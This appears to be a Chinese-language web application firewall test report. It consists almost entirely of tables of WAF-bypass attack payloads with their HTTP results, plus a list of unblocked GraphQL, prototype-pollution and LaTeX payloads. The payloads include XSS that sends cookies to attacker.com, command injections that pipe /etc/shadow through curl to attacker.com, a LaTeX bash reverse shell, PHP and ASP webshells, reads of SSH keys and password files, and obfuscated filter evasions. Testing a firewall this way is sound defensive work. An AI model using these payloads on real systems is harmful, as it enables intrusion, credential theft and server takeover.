🛡️POSTSQLi WAF 绕过 - REGEXP 替代等号1 AND 'a' REGEXP '^a'--403
🛡️POSTSQLi WAF 绕过 - LIKE 替代等号1 AND 'a' LIKE 'a'--403
🛡️POSTSQLi WAF 绕过 - BETWEEN 替代等号1 AND 1 BETWEEN 1 AND 1--403
🛡️POSTSQLi WAF 绕过 -替代 OR
🛡️POSTSQLi WAF 绕过 - && 替代 AND'%26%26(SELECT 1 FROM mysql.user WHERE user='root')>0--403
🛡️POSTSQLi WAF 绕过 - 双写绕过 WAF 关键字删除1 UNIUNIONSELECTON SELECT 1,user(),3--403
🛡️POSTSQLi WAF 绕过 - 大小写混合绕过关键字过滤1 UnIoN SeLeCt 1,version(),3--403
🛡️POSTSQLi WAF 绕过 - 百分号绕过1 UNION SELECT 1,2,3 FROM dual WHERE 1=1 AND 2344=2344 AND '1q'='1q403
🛡️POSTSQLi WAF 绕过 - ORDER BY 盲注替代 UNION1 ORDER BY (SELECT 1 FROM information_schema.columns WHERE table_name=0x7573657273)--403

4.28 waf bypass sqli db

  • 项目数: 16 | 通过: 16 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTWAF SQLi 绕过 - MSSQL 注释替代空格'/**/UNION/**/SELECT/**/1,user(),version(),4,5/**/FROM/**/mysql.user--403
🛡️POSTWAF SQLi 绕过 - MSSQL 十六进制编码绕过字符串检测1 UNION SELECT 0x730065006C00650063007400 FROM master..sysdatabases--403
🛡️POSTWAF SQLi 绕过 - MSSQL 括号绕过空格1=(SELECT(1)FROM(master..sysdatabases)WHERE(name LIKE'%'))403
🛡️POSTWAF SQLi 绕过 - MySQL 反引号绕过关键字1%60UNION%60SELECT%601,user(),3%60FROM%60mysql.user%60--403
🛡️POSTWAF SQLi 绕过 - PostgreSQL 类型转换绕过 UNION 检测1 UNION SELECT NULL::text,current_database()::text,3--403
🛡️POSTWAF SQLi 绕过 - PostgreSQL $$ 引用绕过引号检测1 UNION SELECT $$tablename$$,2,3 FROM information_schema.tables--403
🛡️POSTWAF SQLi 绕过 - MySQL /!50000/ 版本注释绕过'/*!50000UNION*//*!50000SELECT*/1,user(),version(),4,5/*!50000FROM*//*!50000mysql.user*/--403
🛡️POSTWAF SQLi 绕过 - MySQL 浮点数科学计数法绕过1.e(UNION)e(SELECT)e(1,2,3)e(FROM)e(dual)--403
🛡️POSTWAF SQLi 绕过 - Oracle ROWNUM 限制绕过' UNION SELECT username,password FROM all_users WHERE ROWNUM=1--403
🛡️POSTWAF SQLi 绕过 - MySQL 等价函数替换 (MID 替代 SUBSTRING)' AND IF(MID((SELECT password FROM users LIMIT 1),1,1)='a',SLEEP(5),0)--403
🛡️POSTWAF SQLi 绕过 - MySQL BENCHMARK 替代 SLEEP 绕过延时检测' AND IF(1=1,BENCHMARK(50000000,MD5('x')),1)--403
🛡️POSTWAF SQLi 绕过 - PostgreSQL CHR 替代引号1 UNION SELECT CHR(116)||CHR(97)||CHR(98)||CHR(108)||CHR(101),2,3--403
🛡️POSTWAF SQLi 绕过 - MySQL 双 URL 编码绕过%25%32%37%25%32%30%25%35%35%25%34%65%25%34%39%25%34%66%25%34%65%25%32%30%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%33%31403
🛡️POSTWAF SQLi 绕过 - Oracle NVL 函数绕过空值检测' UNION SELECT NVL(username,'NULL'),NVL(password,'NULL') FROM all_users--403
🛡️POSTWAF SQLi 绕过 - 换行符替换空格 (所有DB)1%0aUNION%0aSELECT%0a1,2,3%0aFROM%0adual--403
🛡️POSTWAF SQLi 绕过 - 制表符 %09 混合注释绕过1%09UNION%09SELECT%09%09--%09%0a1,2,3%09--%09%0aFROM%09users--403

4.29 waf bypass xss

  • 项目数: 19 | 通过: 19 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTXSS WAF 绕过 - 空格替换 (0x0C 换页符绕过空格检测)<svg%0Conload=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS WAF 绕过 - 大小写混淆绕过标签过滤<ScRiPt>fetch('http://attacker.com/'+document.cookie)</sCrIpT>403
🛡️POSTXSS WAF 绕过 - 反斜杠替代空格<img/src=x/onerror=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS WAF 绕过 - HTML 实体编码混淆 (十进制)<svg onload=&#102&#101&#116&#099&#104&#040&#039&#104&#116&#116&#112&#058&#047&#047&#097&#116&#116&#097&#099&#107&#101&#114&#046&#099&#111&#109&#047&#0...403
🛡️POSTXSS WAF 绕过 - null 字节注入绕过 onxxx 过滤<img src=x onerror\x00=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS WAF 绕过 - 反引号绕过圆括号过滤<script>fetchhttp://attacker.com/${document.cookie}</script>403
🛡️POSTXSS WAF 绕过 - 字符串拼接绕过关键字黑名单<script>eval('fetc'+'h("http://attacker.com/"+docu'+'ment.cookie)')</script>403
🛡️POSTXSS WAF 绕过 - window 下标访问绕过属性黑名单<script>window['fetch']('http://attacker.com/'+document['cookie'])</script>403
🛡️POSTXSS WAF 绕过 - atob base64 编码绕过关键词<script>eval(atob('ZmV0Y2goJ2h0dHA6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWUp'))</script>403
🛡️POSTXSS WAF 绕过 - throw 绕过圆括号过滤<script>{onerror=fetch}throw'http://attacker.com/'+document.cookie</script>403
🛡️POSTXSS WAF 绕过 - 模板字符串绕过引号过滤<svg/onload=fetch(http://attacker.com/${document.cookie})>403
🛡️POSTXSS WAF 绕过 - Unicode 编码绕过 (< 和 >)\u003cscript\u003efetch('http://attacker.com/'+document.cookie)\u003c/script\u003e403
🛡️POSTXSS WAF 绕过 - JSFuck 编码绕过 WAF (仅 +!()[] 字符)<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[]</script>403
🛡️POSTXSS WAF 绕过 - data:text/html base64 绕过<object data="data:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS8nK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">403
🛡️POSTXSS WAF 绕过 - 无效属性混淆 + 真实 onload<svg/onrandom=random onload=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS WAF 绕过 - SVG animate 事件绕过过滤<svg><animate onbegin=fetch('http://attacker.com/'+document.cookie) attributeName=x dur=1s>403
🛡️POSTXSS WAF 绕过 - details 标签 ontoggle 事件<details open ontoggle=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS WAF 绕过 - marquee 标签 onstart 事件<marquee onstart=fetch('http://attacker.com/'+document.cookie)>403
🛡️POSTXSS WAF 绕过 - 分号分隔无空格<script>fetch('http://attacker.com/'+document.cookie)</script><script>void(0)</script>403

4.30 waf bypass command

  • 项目数: 18 | 通过: 18 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTCMD WAF 绕过 - ${IFS} 替代空格执行命令;cat${IFS}/etc/shadow403
🛡️POSTCMD WAF 绕过 - {} 大括号展开替代空格;{cat,/etc/shadow}403
🛡️POSTCMD WAF 绕过 - TAB 编码 %09 替代空格;cat%09/etc/shadow403
🛡️POSTCMD WAF 绕过 - $() 命令替换执行;$(cat /etc/shadow|base64|curl attacker.com -d @-)403
🛡️POSTCMD WAF 绕过 - 反引号命令替换执行;cat /etc/shadow|base64|curl attacker.com -d @-``403
🛡️POSTCMD WAF 绕过 - 十六进制编码绕过关键词过滤;echo -e '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77'|bash403
🛡️POSTCMD WAF 绕过 - xxd 十六进制还原执行;xxd -r -p<<<636174202f6574632f736861646f777c62617365|bash403
🛡️POSTCMD WAF 绕过 - 八进制编码绕过关键词过滤;eval $'\143\141\164\040\057\145\164\143\057\163\150\141\144\157\167'403
🛡️POSTCMD WAF 绕过 - 通配符绕过命令名关键字;/??n?/?at /???/????d?w403
🛡️POSTCMD WAF 绕过 - printf 十六进制还原执行;$(printf '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77')|bash403
🛡️POSTCMD WAF 绕过 - 大小写混合绕过命令名检测;CaT /eTc/ShAdOw|base64|curl attacker.com -d @-403
🛡️POSTCMD WAF 绕过 - 引号包裹绕过命令名检测;c'a't /e't'c/s'h'adow|base64|curl attacker.com -d @-403
🛡️POSTCMD WAF 绕过 - 双引号包裹绕过命令名检测;c"a"t /e"t"c/s"h"adow|base64|curl attacker.com -d @-403
🛡️POSTCMD WAF 绕过 - $@ 空变量绕过命令名检测;c$@at /etc/shadow403
🛡️POSTCMD WAF 绕过 - 输入重定向替代空格;cat</etc/shadow403
🛡️POSTCMD WAF 绕过 - 变量截取构造 / 符号 (${HOME:0:1});cat ${HOME:0:1}etc${HOME:0:1}shadow403
🛡️POSTCMD WAF 绕过 - tr 字符替换构造 /;cat $(echo .|tr '!-0' '"-1')etc$(echo .|tr '!-0' '"-1')shadow403
🛡️POSTCMD WAF 绕过 - base64 全编码绕过;echo Y3VybCBhdHRhY2tlci5jb20vJChjYXQgL2V0Yy9zaGFkb3d8YmFzZTY0KQ== |base64 -d|bash403

4.31 waf bypass path

  • 项目数: 11 | 通过: 10 | 通过率: 90.9%
状态方法项目描述PayloadHTTP 状态码
🛡️GETWAF 路径绕过 - 双写 ../ 读取 /etc/passwd 获取系统用户....//....//....//etc/passwd403
🛡️GETWAF 路径绕过 - URL 编码 ../ 读取 /etc/shadow 密码哈希%2e%2e/%2e%2e/%2e%2e/etc/shadow403
⚠️GETWAF 路径绕过 - 双 URL 编码读取 root SSH 私钥横向移动%252e%252e%252f%252e%252e%252f%252e%252e%252froot%252f.ssh%252fid_rsa200
🛡️GETWAF 路径绕过 - ..;/ 分号截断读取 Nginx 配置泄露后端地址..;/..;/..;/etc/nginx/sites-enabled/default403
🛡️GETWAF 路径绕过 - 反斜杠绕过读取 Windows SAM 密码数据库..\..\..\windows\system32\config\SAM403
🛡️GETWAF 路径绕过 - 绝对路径 /../ 读取 /etc/shadow/../../../../etc/shadow403
🛡️GETWAF 路径绕过 - 空字节截断 .html 后缀读取 passwd../../../etc/passwd%00.html403
🛡️GETWAF 路径绕过 - 路径填充 ./ 绕过深度限制读取 MySQL 配置../../../etc/mysql/my.cnf/./././././.403
🛡️GETWAF 路径绕过 - %23 注释截断读取 SSH 私钥../../../root/.ssh/id_rsa%23403
🛡️GETWAF 路径绕过 - %3F 问号截断读取数据库配置文件../../../var/www/html/config/database.php%3F403
🛡️GETWAF 路径绕过 - 双重 URL 编码空字节截断读取 passwd../../../etc/passwd%2500.html403

4.32 waf bypass lfi

  • 项目数: 9 | 通过: 9 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️GETLFI WAF 绕过 - php://filter base64 绕过读取源码php://filter/convert.base64-encode/resource=index.php403
🛡️GETLFI WAF 绕过 - data:// 封装器绕过data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9zaGFkb3cnKTs/Pg==403
🛡️GETLFI WAF 绕过 - php://filter 链 RCE (iconv filter chain)php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1026.UTF16|convert.iconv.L6.UNICODE|convert....403
🛡️GETLFI WAF 绕过 - expect:// 封装器绕过expect://cat /etc/shadow403
🛡️GETLFI WAF 绕过 - compress.zlib:// 封装器绕过路径检测compress.zlib://file:///etc/shadow403
🛡️GETLFI WAF 绕过 - zip:// 封装器绕过zip:///var/www/uploads/evil.zip%23shell.php403
🛡️POSTLFI WAF 绕过 - php://input 绕过 (POST body 注入)php://input + Body: <?php system('id');?>403
🛡️GETLFI WAF 绕过 - phar:// 反序列化绕过phar://uploads/evil.jpg/shell.php403
🛡️GETLFI WAF 绕过 - pearcmd.php RCE/usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET[1])?>+/tmp/shell.php403

4.33 waf bypass xxe

  • 项目数: 11 | 通过: 11 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTXXE WAF 绕过 - XInclude 绕过 DOCTYPE 限制<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/shadow"/></foo>403
🛡️POSTXXE WAF 绕过 - Base64 编码绕过文件内容检测<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">]><foo>&xxe;</foo>403
🛡️POSTXXE WAF 绕过 - UTF-7 编码绕过检测<?xml version="1.0" encoding="UTF-7"?>+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-xxe+ACA-SYSTEM+ACA-+ACI-file:///etc/shadow+ACIAPg-+ADs-+...403
🛡️POSTXXE WAF 绕过 - 参数实体 + 外部 DTD OOB 绕过<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/xxe.dtd">%xxe;%exfil;]><foo>test</foo>403
🛡️POSTXXE WAF 绕过 - SVG 文件格式绕过<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><svg width="100" height="100">&xxe;</svg>403
🛡️POSTXXE WAF 绕过 - 双编码文件路径<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///%252e%252e/%252e%252e/etc/shadow">]><foo>&xxe;</foo>403
🛡️POSTXXE WAF 绕过 - SOAP 格式绕过<soap:Body xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo></soap:Bod...403
🛡️POSTXXE WAF 绕过 - GSM 字符集编码绕过<?xml version="1.0" encoding="gsm"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>403
🛡️POSTXXE WAF 绕过 - netdoc:// 协议绕过 (Java)<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "netdoc:///etc/shadow">]><foo>&xxe;</foo>403
🛡️POSTXXE WAF 绕过 - jar:// 协议读取 Java 应用配置<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///var/www/app.war!/WEB-INF/web.xml">]><foo>&xxe;</foo>403
🛡️POSTXXE WAF 绕过 - document() 函数读取文件 (XSLT)<xsl:value-of select="document('/etc/shadow')"/>403

4.34 waf bypass upload

  • 项目数: 15 | 通过: 15 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTUPLOAD WAF 绕过 - 双扩展名绕过 (.php.jpg) + Webshellshell.php.jpg <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - 空字节截断绕过 (PHP < 5.3) + Webshellshell.php%00.jpg <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - 尾随空格绕过 + Webshellshell.php <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - 尾随点号绕过 + Webshellshell.php. <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - 分号截断绕过 (IIS 6.0) + Webshellshell.asp;.jpg <% Execute(Request("cmd")) %>403
🛡️POSTUPLOAD WAF 绕过 - Content-Type 伪造为 image/jpeg + WebshellContent-Type: image/jpeg <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - 图片头伪造 (GIF89a) + WebshellGIF89a;<?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - 图片头伪造 (PNG) + Webshell\x89PNG\r\n\x1a\n<?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - PHP 短标签绕过 + Webshell<?=system($_GET[1])?>403
🛡️POSTUPLOAD WAF 绕过 - PHP 长标签绕过黑名单 + Webshell<script language="php">system($_GET[1]);</script>403
🛡️POSTUPLOAD WAF 绕过 - Windows ADS 写入隐藏流 + Webshellshell.php::$DATA <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - NTFS 文件系统特性绕过 (::$INDEX_ALLOCATION)shell.php::$INDEX_ALLOCATION <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - phtml 扩展名绕过 + Webshellshell.phtml <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - pHp 大小写绕过 + Webshellshell.pHp <?php system($_GET[1]);?>403
🛡️POSTUPLOAD WAF 绕过 - Unicode 文件名绕过 + Webshellshell.php%E3%80%82jpg <?php system($_GET[1]);?>403

4.35 waf bypass general

  • 项目数: 10 | 通过: 10 | 通过率: 100.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTWAF 通用绕过 - HTTP 方法篡改 (GET 改 POST 绕过 URL 检测)POST /endpoint?id=1' OR '1'='1403
🛡️POSTWAF 通用绕过 - HTTP 参数污染 (HPP) 多次传参id=1&id=1 UNION SELECT 1,2,3--403
🛡️POSTWAF 通用绕过 - Content-Type 篡改为 multipart/form-dataContent-Type: multipart/form-data; boundary=x Body: --x\r\nContent-Disposition: form-data; name="id"\r\n\r\n1' OR '1'='1\r\n--x--403
🛡️POSTWAF 通用绕过 - Chunked Transfer-Encoding 分块混淆Transfer-Encoding: chunked\r\n\r\n5\r\n1' OR \r\n6\r\n'1'='1\r\n0\r\n\r\n403
🛡️POSTWAF 通用绕过 - Content-Type 篡改为 application/jsonContent-Type: application/json Body: {"id":"1' OR '1'='1"}403
🛡️POSTWAF 通用绕过 - 超大请求体绕过检测深度限制 (10000 填充字节)AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...403
🛡️POSTWAF 通用绕过 - HTTP/1.0 降级绕过高级检测GET /endpoint?id=1' OR '1'='1 HTTP/1.0403
🛡️POSTWAF 通用绕过 - 请求体压缩绕过 (gzip)Content-Encoding: gzip 1' UNION SELECT 1,2,3--403
🛡️POSTWAF 通用绕过 - 请求头大小写混淆Content-TYPE: application/x-www-form-urlencoded id=1' OR '1'='1403
🛡️POSTWAF 通用绕过 - Pipeline 请求走私绕过GET /endpoint?id=1 HTTP/1.1\r\nHost: target\r\n\r\nGET /endpoint?id=1' OR '1'='1 HTTP/1.1\r\nHost: target\r\n\r\n403

4.36 latex injection

  • 项目数: 10 | 通过: 9 | 通过率: 90.0%
状态方法项目描述PayloadHTTP 状态码
🛡️POSTLaTeX - \include 包含任意 .tex 文件泄露敏感配置\include{/var/www/html/config/database}403
🛡️POSTLaTeX - \input 读取 /etc/passwd 泄露系统用户列表\input{/etc/passwd}403
🛡️POSTLaTeX - \lstinputlisting 逐行读取 /etc/shadow 泄露密码哈希\lstinputlisting{/etc/shadow}403
🛡️POSTLaTeX - \verbatiminput 原始读取 /etc/passwd 不做解释\verbatiminput{/etc/passwd}403
🛡️POSTLaTeX - \immediate\write18 写入 Webshell 到 Web 目录 Getshell\immediate\write18{echo '<?php system(\$_GET[1]);?>' > /var/www/html/latex.php}403
⚠️POSTLaTeX - \immediate\write18 执行 id 命令确认代码执行能力\immediate\write18{id}200
🛡️POSTLaTeX - 逐行循环读取多行敏感文件 (/etc/shadow)\newread\file\openin\file=/etc/shadow\loop\unless\ifeof\file\read\file to\line\text{\line}\repeat\closein\file403
🛡️POSTLaTeX - \immediate\write18 curl 数据外带泄露到攻击者服务器\immediate\write18{curl http://attacker.com/$(cat /etc/passwd|base64)}403
🛡️POSTLaTeX - ^^ 字符编码绕过黑名单过滤读取 /etc/passwd\lstin^^70utlisting{/etc/passwd}403
🛡️POSTLaTeX - \immediate\write18 反弹 Shell (bash TCP)\immediate\write18{bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'}403

5. 未通过测试项目汇总

以下 16 条项目未通过检测,建议重点审查:

分类描述Payload状态码
waf bypass pathWAF 路径绕过 - 双 URL 编码读取 root SSH 私钥横向移动%252e%252e%252f%252e%252e%252f%252e%252e%252froot%252f.ssh%252fid_rsa200
command injection命令注入 - nmap 扫描内网端口; nmap -Pn -p 22,80,443,3306,6379 10.0.0.0/24200
prototype pollution原型污染 - constructor.prototype 注入管理员标记{"constructor":{"prototype":{"isAdmin":true}}}200
prototype pollution原型污染 - 绕过 JSON.parse 安全过滤 (obj 前缀){"obj.__proto__.status":"admin"}200
graphql injectionGraphQL - 内省查询 dump 数据库 Schema 泄露全部结构和字段{__schema{types{name,fields{name,type{name,kind}}}}}200
graphql injectionGraphQL - 类型枚举查询 获取单个类型定义泄露敏感字段{__type(name:"User"){name,fields{name,type{name,kind,ofType{name,kind}}}}}200
graphql injectionGraphQL - 内省查询 dump mutation 操作泄露数据修改入口{__schema{mutationType{name,fields{name,args{name,type{name,kind}}}}}}200
graphql injectionGraphQL - 深度嵌套查询 DoS 攻击(资源耗尽拖垮服务){user{posts{comments{author{posts{comments{author{posts{comments{content}}}}}}}}}}200
graphql injectionGraphQL - Batching 攻击 批量并发认证爆破绕过速率限制[{"query":"mutation{login(username:\"admin\",password:\"admin123\"){token}}"},{"query":"mutation{login(username:\"admin\",password:\"password\"){token}}"},{"query":"mutation{login(username:\"admin\",p...200
graphql injectionGraphQL - 别名 Aliases 绕过速率限制并发暴力破解{m1:login(p:"1"){t} m2:login(p:"2"){t} m3:login(p:"3"){t} m4:login(p:"4"){t} m5:login(p:"5"){t}}200
graphql injectionGraphQL - 内省查询 + dump 全部 Directive 定义泄露安全策略{__schema{directives{name,description,locations,args{name,description}}}}200
graphql injectionGraphQL - 无内省但利用字段推荐机制枚举隐藏字段{__schema{types{name}}} {user(id:1){name,NOTEXIST}}200
graphql injectionGraphQL - Mutation 注入创建管理员账户提权mutation{addUser(name:"hacker",email:"hacker@evil.com",role:"admin"){id,name,role}}200
graphql injectionGraphQL - NoSQL 注入通过 GraphQL 参数提取所有用户数据{user(id:"{\"$gt\":\"\"}"){name,email,password}}200
graphql injectionGraphQL - 内省查询 dump subscription 操作泄露实时数据通道{__schema{subscriptionType{name,fields{name,type{name,kind,ofType{name,kind}}}}}}200
latex injectionLaTeX - \immediate\write18 执行 id 命令确认代码执行能力\immediate\write18{id}200
最近更新::
Contributors: 青冰